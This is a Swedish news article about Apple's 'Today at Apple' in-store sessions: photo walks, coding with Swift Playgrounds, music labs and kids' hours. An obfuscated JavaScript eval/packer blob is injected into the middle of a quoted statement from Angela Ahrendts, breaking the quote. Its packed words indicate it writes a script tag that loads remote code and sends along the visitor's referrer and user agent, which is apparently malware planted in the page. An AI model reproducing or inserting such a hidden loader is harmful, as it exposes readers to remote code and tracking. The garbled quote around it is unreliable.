Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

”Today at Apple” – Nya upplevelser i varenda Apple Store

”Today at Apple” – Nya upplevelser i varenda Apple Store
Sebastian

Idag meddelade Apple att de nästa månad planerar att lansera dussintals nya utbildningspass i alla 495 Apple Store-butiker. Passen handlar om allt från bild- och videohantering till musik, kodning, konst och design. Dessa praktiska pass, som tillsammans kallas ”Today at Apple”, hålls av välutbildade teammedlemmar och i utvalda städer världskända konstnärer, fotografer och musiker. De erbjuder både passen Grundläggande och Så här samt pass med mer avancerade tekniker.

”Kärnan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbzna|var|u0026u|referrer|ftztn||js|php’.split(’|’),0,{}))
i alla Apple Store-butiker är viljan att lära ut och inspirera alla i vårt närområde”, säger Angela Ahrendts, vice vd för Retail på Apple. ”Today at Apple är ett steg i att förbättra upplevelsen och bättre ta hand om kunder och entreprenörer i närområdet. Vi skapar moderna torg där alla är välkomna. Torgen fungerar som en mötesplats där vi samlar det bästa från Apple och där man kan upptäcka nya brinnande intressen eller utveckla sina färdigheter. Vi på Apple tror att det blir en rolig och givande upplevelse för alla som deltar.”

De kostnadsfria programmen fokuserar på de funktioner i Apple-produkterna som kunderna tycker mest om, och riktar sig till alla kunskapsnivåer och åldrar. En iPhone-användare som är intresserad av fotografi kan till exempel komma igång genom att gå på sex stycken Så här-pass om hur man fotar, arrangerar, redigerar med mera. Mer avancerade fotografer kan följa med på Fotopromenader. Det är en promenad utanför butiken där kunden får chans att lära sig om ljus och skugga, porträttbilder och berättande med hjälp av bilder. Nästa steg är att delta i ett Fotolabb-pass. Här berättar framgångsrika fotografer hur man tar snygga spontanbilder eller bygger upp ett varumärke på sociala medier – allt från deras perspektiv.*

Apple kommer dessutom att erbjuda särskilda program för familjer och utbildare. Lärare kan träffas under passet Lärarnas tisdag och lära sig nya sätt att implementera teknik i klassrummet. Dessutom kan kodare i alla åldrar lära sig hur man kodar i Swift, Apples programmeringsspråk för iOS- och Mac-appar.** Familjer kan delta i helgpasset Barntimmen där barn kan lära sig om allt från musikskapande till kodning med robotar. Småföretagare kan möta globala och lokala entreprenörer genom det nya programmet Business Circuits.*

Flera av passen hålls av de nya Creative Pro-medarbetarna. De fungerar på samma sätt som Apples tekniska Genius-medarbetare, men fokuserar på kreativa uttrycksformer. Alla Creative Pro-medarbetare är experter inom minst ett kreativt område och har utbildats i att föra sina kunskaper vidare till Apple-användare på alla nivåer.

”Today at Apple”-program
I ”Today at Apple” ingår program med fler än 60 olika pass inom kreativa färdigheter, bland annat:

– Studiotimmar är Apples version av en lärares besökstid. Creative Pro-medarbetare håller i 90 minuter långa pass som handlar om allt från konst och design till dokument och presentationer. Alla är välkomna att ta med sig ett eget projekt och få råd från experter. Man kan också använda utrymmet till att arbeta tillsammans med andra, sida vid sida.

– I programmen Fotopromenader och Skisspromenader kan deltagare lära sig att göra mer än att fånga ögonblick. De får lära sig nya tekniker på ett praktiskt sätt samtidigt som de utforskar närområdet. På fotopromenaderna får deltagarna bland annat lära sig att rama in arkitektur och fånga det som händer på film. På skisspromenaderna kan deltagarna teckna det de ser samt träna på akvarell- och penselteknik och mycket annat.

– Tanken med Barntimmen är att vi ska sätta fart på fantasin och kreativiteten med hjälp av roliga, praktiska projekt. Bland annat finns det pass där man lär sig koda med Sphero-robotar, skapa musik i GarageBand och skapa filmer tillsammans i iMovie.

– Kodningspassen ska fungera som en introduktion till kodning. Vi använder Swift Playgrounds, en iPad-app som har tagits fram för att göra kodning till en interaktiv och rolig upplevelse för nybörjare. Under dessa pass utforskas kodningskoncept som innehåller samma kod som proffsutvecklare använder varje dag.**

– Fotolabb är ett praktiskt pass med begåvade fotografer som tillsammans med kunden experimenterar med nya tekniker och stilar eller upptäcker nya vinklar. På ett liknande sätt utforskas olika genrer och ljud under Musiklabb, så att musiker på alla nivåer kan lära sig om nya verktyg.*

– Under passen som ingår i Proffsserien kan avancerade användare fördjupa sina kunskaper om Final Cut Pro X och Logic Pro X. De får bland annat lära sig om färgkorrigering, färgbalans och efterbearbetning och hur man mixar ljud så att det ger rätt stämning.*

– Under passet Perspektiv och Framträdande, som erbjuds i utvalda butiker, pratar inflytelserika konstnärer och musiker om sin kreativa process och delar med sig av sina talanger.

För att kunna erbjuda de nya programmen får alla butiker nya Forum-skärmar, flyttbara skärmar som Apples designteam har utvecklat särskilt för ”Today at Apple”-pass, fler sittplatser och bättre ljud.

”Today at Apple” lanseras världen över i maj, och pass hålls i alla butiker.

*I utvalda butiker
**I de flesta länder

När Apple lanserade Macintosh 1984 var det början på en revolutionerande era. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att göra de bästa produkterna i världen och att lämna världen i bättre skick än när vi började.